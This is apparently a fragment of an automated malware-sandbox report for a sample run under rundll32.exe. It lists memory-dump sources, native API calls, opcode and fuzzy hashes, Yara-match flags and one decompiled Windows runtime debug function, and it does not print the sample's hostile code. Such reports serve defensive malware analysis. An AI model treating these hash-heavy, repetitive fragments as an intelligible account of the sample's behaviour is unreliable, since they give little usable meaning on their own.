                                                  0x1e2764aa
                                                  0x1e27652c
                                                  0x1e27652d
                                                  0x1e27652e
                                                  0x1e276539

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  • Opcode ID: b11afcde3e30e44e003d9ec1ad97c0a8f4efa1dfd408fcf4340125a01bda22db
                                                  • Instruction ID: 1e09d5e77e84bc02c0bc7927e66df8bc2a555920764b8446d17a5889bd584a44
                                                  • Opcode Fuzzy Hash: b11afcde3e30e44e003d9ec1ad97c0a8f4efa1dfd408fcf4340125a01bda22db
                                                  • Instruction Fuzzy Hash: 08416BB5A047469FC310CF28C4A4A1BBBE5BB89714F144A2EF888DB341D731EA45CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E2DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E1E2DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E28CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E2D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E2D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x1e2dfdda
                                                  0x1e2dfde2
                                                  0x1e2dfde5
                                                  0x1e2dfdec
                                                  0x1e2dfdfa
                                                  0x1e2dfdff
                                                  0x1e2dfe0a
                                                  0x1e2dfe0f
                                                  0x1e2dfe17
                                                  0x1e2dfe1e
                                                  0x1e2dfe19
                                                  0x1e2dfe19
                                                  0x1e2dfe19
                                                  0x1e2dfe20
                                                  0x1e2dfe21
                                                  0x1e2dfe22
                                                  0x1e2dfe25
                                                  0x1e2dfe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E2DFDFA
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E2DFE01
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E2DFE2B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 47c8467a0f901be70f9cdbd2e8da94144b229db36ea04fbccb14d8c02cbae218
                                                  • Instruction ID: 783acc8ae281aa9357ffc47c86a59c2f8946e10f62cd64e52ff85e86e20b8531
                                                  • Opcode Fuzzy Hash: 47c8467a0f901be70f9cdbd2e8da94144b229db36ea04fbccb14d8c02cbae218
                                                  • Instruction Fuzzy Hash: 14F0F67A500241BFE6244A45DC01F63BB5EFB45731F244714F728562D1DA62F860C6F4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: rundll32.exe PID: 6456 Parent PID: 3472 rundll32.exeCOMMON

                                                  Executed Functions

                                                  Function 001A819A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,001A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 001A822D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 6e5594c5d0229644864939b6fd467bc9b8200753b214edc2fdf5ff9974890dd5
                                                  • Instruction ID: 52260afe784b0feacf4b1dedfdbdaa84788253de7daf5c8027c526c1c830bf40
                                                  • Opcode Fuzzy Hash: 6e5594c5d0229644864939b6fd467bc9b8200753b214edc2fdf5ff9974890dd5
                                                  • Instruction Fuzzy Hash: 3111D3B6604208AFCB08DF88DC85DEB73ADAF9C754F108609BA1997241D630EC11CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A81DC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,001A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 001A822D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 9750663c0dbb45f9805112c2f852a51c6b47ffd782649532eb310bec746bd314
                                                  • Instruction ID: 21eb617a5624e64c9d40cef0efe50c25b606283607527f3816e22399bcbba8d9
                                                  • Opcode Fuzzy Hash: 9750663c0dbb45f9805112c2f852a51c6b47ffd782649532eb310bec746bd314
                                                  • Instruction Fuzzy Hash: 7E11E2B6200208AFCB08DF98DC85DEB73ADAF8C754F148608FA0D97241CA30EC11CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A8235, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,001A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 001A822D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: db71c1077caa39bb728a32841c7a2a375d51c364890a0359f293f2c3adedf1c1
                                                  • Instruction ID: dd3224efc745a9388f0722697aabbd93c950747945f94412726cdb239125e4ac
                                                  • Opcode Fuzzy Hash: db71c1077caa39bb728a32841c7a2a375d51c364890a0359f293f2c3adedf1c1
                                                  • Instruction Fuzzy Hash: 8E11E2B2204149AFCB08DF98D884CEB77A9FF9C314B15864DFA5D97251D630E852CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A81E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,001A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 001A822D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction ID: dc9fc544faa57fde8640ab2ee30aaa5cf64ff26f955ebb0735134f927865b502
                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction Fuzzy Hash: F0F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A828A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(001A3D62,5E972F59,FFFFFFFF,001A3A21,?,?,001A3D62,?,001A3A21,FFFFFFFF,5E972F59,001A3D62,?,00000000), ref: 001A82D5
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: e877794bb75df1e56ee8cd805e929f4c9e1859ae7bad5006c2968593b8857bdc
                                                  • Instruction ID: 50f35dd7cb010c34e9471be8fc34f210de4b76b54880db444395138aebb4992b
                                                  • Opcode Fuzzy Hash: e877794bb75df1e56ee8cd805e929f4c9e1859ae7bad5006c2968593b8857bdc
                                                  • Instruction Fuzzy Hash: D2F0E7B6200108AFDB14DF99DC80EEB77A9BF9C354F158248BA1DA7241C630E811CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A8290, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(001A3D62,5E972F59,FFFFFFFF,001A3A21,?,?,001A3D62,?,001A3A21,FFFFFFFF,5E972F59,001A3D62,?,00000000), ref: 001A82D5
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction ID: e43aed59f944fcf6067936c8a37178650fc99f998d300944d8185efd1a3dcb64
                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction Fuzzy Hash: C8F0A4B6200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E811CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A83C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00192D11,00002000,00003000,00000004), ref: 001A83F9
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction ID: 6b4d72a816dfb1c9460c057396af4231571e598873a79411578550033603e872
                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction Fuzzy Hash: AFF015B6200208ABCB14DF89CC81EAB77ADAF88750F118148BE0897281C630F810CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A8310, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(001A3D40,?,?,001A3D40,00000000,FFFFFFFF), ref: 001A8335
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction ID: d0a26ad3980d17142f3919cba9b1ca078955e102d4ef1caddd801586ebec941c
                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction Fuzzy Hash: C3D01776600214ABD710EFD8CC85EA77BACEF48760F154499BA189B282CA30FA00C6E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001A830B, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(001A3D40,?,?,001A3D40,00000000,FFFFFFFF), ref: 001A8335
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: bef1f3c59d9321978a354a1dff72907151fc699cdab189df370688a9d3ed9626
                                                  • Instruction ID: 085b7de8a13310fbba7bac9285e378a91814703dba6918a1597bfe3094019d06
                                                  • Opcode Fuzzy Hash: bef1f3c59d9321978a354a1dff72907151fc699cdab189df370688a9d3ed9626
                                                  • Instruction Fuzzy Hash: 3DE0C275200200BBD710EFD4DC84FD73718EF44360F044049FA0C9B281C630E500C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a99dae5721908a92509f1444bd1b7ac7e1ff458b3447c5440359745ec6130844
                                                  • Instruction ID: c546123feae6837561bd990b7b96cf12dd4914edac3baf05a40d15097e9528c2
                                                  • Opcode Fuzzy Hash: a99dae5721908a92509f1444bd1b7ac7e1ff458b3447c5440359745ec6130844
                                                  • Instruction Fuzzy Hash: C69002A5711004032505A55A0704507004697D5395351C022F1016550CDB65D8616162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 044595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4ca8241808306b6478dbd783677d574296c1645f94bd3a52deb2d91351b01cd6
                                                  • Instruction ID: 19429a6e6c310a03e66197ec4ed15e3aea32b9caf52721c9af5828a5f24a6c34
                                                  • Opcode Fuzzy Hash: 4ca8241808306b6478dbd783677d574296c1645f94bd3a52deb2d91351b01cd6
                                                  • Instruction Fuzzy Hash: 0D9002E1702004036505715A4414616400A97E0245B51C022E1015590DCA69D8917166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 269e54162859fee1a079bb327aa1ec8924980d24e764c76091d644c2b611682e
                                                  • Instruction ID: b80e1f15bb513f68cd52e3ea53fa39c4d3880799f804500aa8bb53859f1d698b
                                                  • Opcode Fuzzy Hash: 269e54162859fee1a079bb327aa1ec8924980d24e764c76091d644c2b611682e
                                                  • Instruction Fuzzy Hash: 2E9002B170504C42F540715A4404A46001597D0349F51C012A0065694D9B69DD55B6A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 09e10df01ae0bcc6e6d419ba64abb84e399245eb00fef3ee5cec1fc470dc5819
                                                  • Instruction ID: 088f0a9b6a6db029a1f6c25cae33e8dc409f78f84e30b1956965d4842bfb9b6a
                                                  • Opcode Fuzzy Hash: 09e10df01ae0bcc6e6d419ba64abb84e399245eb00fef3ee5cec1fc470dc5819
                                                  • Instruction Fuzzy Hash: 709002B170100C02F580715A440464A000597D1345F91C016A0026654DCF59DA5977E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 044596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bce2b8b06b824ce5e05d361970aca3f40f88546015de0478b729a883bcf5a058
                                                  • Instruction ID: 7eeeff3acbe5e7fcf6bfd0d2190daa53f2d8f9374e0cd8c99e385434d6d75b0e
                                                  • Opcode Fuzzy Hash: bce2b8b06b824ce5e05d361970aca3f40f88546015de0478b729a883bcf5a058
                                                  • Instruction Fuzzy Hash: D99002B170100C42F500615A4404B46000597E0345F51C017A0125654D8B59D8517562
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 044596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e5a2c23aa515ebfe124f4cb6ce7607b9bdfcf81666144984721855b819d3eebc
                                                  • Instruction ID: b6aca269feff98c33b66b97caeff5b885b595661608983dd5c6f59db5523fb77
                                                  • Opcode Fuzzy Hash: e5a2c23aa515ebfe124f4cb6ce7607b9bdfcf81666144984721855b819d3eebc
                                                  • Instruction Fuzzy Hash: 239002B170108C02F510615A840474A000597D0345F55C412A4425658D8BD9D8917162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 73385ea2beebde3a795fc17a9bb32dc6539a1537b921fc42e55136f260cbd0b1
                                                  • Instruction ID: 0ca89ec0dba68263239bf5426ceb71cf2cd751920b30842b01f405d2fe58a14d
                                                  • Opcode Fuzzy Hash: 73385ea2beebde3a795fc17a9bb32dc6539a1537b921fc42e55136f260cbd0b1
                                                  • Instruction Fuzzy Hash: 149002B170100802F500659A5408646000597E0345F51D012A5025555ECBA9D8917172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bdb989bdffe370e3db1d2d59a106af4c14fa9a6950c930604ac2a20a98f1915c
                                                  • Instruction ID: 1d806798dc4daf84646794ae70086c269ad0714c65daefac145be2d28ffd7aa8
                                                  • Opcode Fuzzy Hash: bdb989bdffe370e3db1d2d59a106af4c14fa9a6950c930604ac2a20a98f1915c
                                                  • Instruction Fuzzy Hash: 9C9002B171114802F510615A8404706000597D1245F51C412A0825558D8BD9D8917163
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b89fa0b5e56f81806ff33cda2383b10c12a5022e5ed488c18b58b4cf197b50e9
                                                  • Instruction ID: 08eba8635297baf8b02cf6465972de059233d00a22b881ae484189f4457f7eef
                                                  • Opcode Fuzzy Hash: b89fa0b5e56f81806ff33cda2383b10c12a5022e5ed488c18b58b4cf197b50e9
                                                  • Instruction Fuzzy Hash: 429002A971300402F580715A540860A000597D1246F91D416A0016558CCE59D8696362
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a8cff7026f615c10009b38dda20c5cfb68ce2623357cedbb27556807e4044877
                                                  • Instruction ID: 35b2f0a5bd7cc36123d2fb11a5d42f22e86e179a397f903dfc21886f702b46f4
                                                  • Opcode Fuzzy Hash: a8cff7026f615c10009b38dda20c5cfb68ce2623357cedbb27556807e4044877
                                                  • Instruction Fuzzy Hash: 169002A1742045527945B15A44045074006A7E0285791C013A1415950C8A6AE856E662
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d1ab89281dacb2372670df9ee8b9314b299282e54a078bf0cb38fba0d5547bfc
                                                  • Instruction ID: dc2ce6701cc8228e0665a25380d59c2d4b143687e24abfbde9ff2bf64988d6cd
                                                  • Opcode Fuzzy Hash: d1ab89281dacb2372670df9ee8b9314b299282e54a078bf0cb38fba0d5547bfc
                                                  • Instruction Fuzzy Hash: C89002B170100813F511615A4504707000997D0285F91C413A0425558D9B9AD952B162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 366266b6a1b1b69fa5387b1c9d9436a700da4bc5bb4b90e730dc567984aaea6d
                                                  • Instruction ID: 83e31e96dbd6127a0492975085bfb6102cf2d7c1860d7038373dd08581290f43
                                                  • Opcode Fuzzy Hash: 366266b6a1b1b69fa5387b1c9d9436a700da4bc5bb4b90e730dc567984aaea6d
                                                  • Instruction Fuzzy Hash: DC9002F170100802F540715A4404746000597D0345F51C012A5065554E8B9DDDD576A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 044599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8ad48f9bcd3b35aea9f2453d6ad2ce097296a84d3caf0460efc3e860c6e1bae6
                                                  • Instruction ID: 12b29f0e07e20819f7aa02706e6c45fdea9ea89f3ddc3a294b7648f3fdb48150
                                                  • Opcode Fuzzy Hash: 8ad48f9bcd3b35aea9f2453d6ad2ce097296a84d3caf0460efc3e860c6e1bae6
                                                  • Instruction Fuzzy Hash: 029002E174100842F500615A4414B060005D7E1345F51C016E1065554D8B5DDC527167
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04459A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.492476179.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: true
                                                  • Associated: 0000000D.00000002.493182995.000000000450B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d2d66591f6c858c6e688e8f94acdfc067aec3cbb8e2e3afccab74512446c4db0
                                                  • Instruction ID: 63da7fe95f2e590b5f12c66411a824da29018b250cabcb78122d76cb4252a466
                                                  • Opcode Fuzzy Hash: d2d66591f6c858c6e688e8f94acdfc067aec3cbb8e2e3afccab74512446c4db0
                                                  • Instruction Fuzzy Hash: CF9002A171180442F600656A4C14B07000597D0347F51C116A0155554CCE59D8616562
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

